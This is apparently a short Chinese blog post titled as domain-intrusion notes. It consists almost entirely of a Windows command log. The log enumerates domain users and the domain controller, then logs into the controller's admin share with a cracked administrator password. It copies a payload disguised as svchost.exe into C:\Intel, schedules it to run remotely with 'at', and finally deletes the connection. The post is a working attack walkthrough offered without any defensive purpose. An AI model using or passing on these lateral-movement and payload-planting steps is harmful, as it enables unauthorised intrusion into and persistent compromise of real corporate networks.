net user /domain //查看域用户
net config server
net config workstation
nltest/dsgetdc:mydomain //查看域控机器的IP
net group "domain computers" /domain //查看域里的成员机器
---------------------------------------------------------------------------------------------------------------------
//已经破解出了域控管理员的密码
C:\>net use \\192.168.1.153 "123456" /user:mydomain\Administrator
The command completed successfully.
C:\>dir \\192.168.1.153\C$
Volume in drive \\192.168.1.153\C$ has no label.
Volume Serial Number is C6BC-1F87
Directory of \\192.168.1.153\C$
C:\>copy C:\programdata\svchost.exe \\192.168.1.153\C$\Intel\svchost.exe
1 file(s) copied.
C:\>at \\192.168.1.153
There are no entries in the list.
C:\>net time \\192.168.1.153
Current time at \\192.168.1.153 is 7/20/2013 4:02:25 PM
The command completed successfully.
C:\>at \\192.168.1.153 16:04 C:\Intel\svchost.exe
Added a new job with job ID = 1
C:\>at \\192.168.1.153
Status ID Day Time Command Line
-------------------------------------------------------------------------------
1 Today 4:04 PM C:\Intel\svchost.exe
C:\>net use \\192.168.1.153 /del
\\192.168.1.153 was deleted successfully.
---------------------------------------------------------------------------------
OKOK!
转载请注明:exchen's blog » 域环境入侵笔记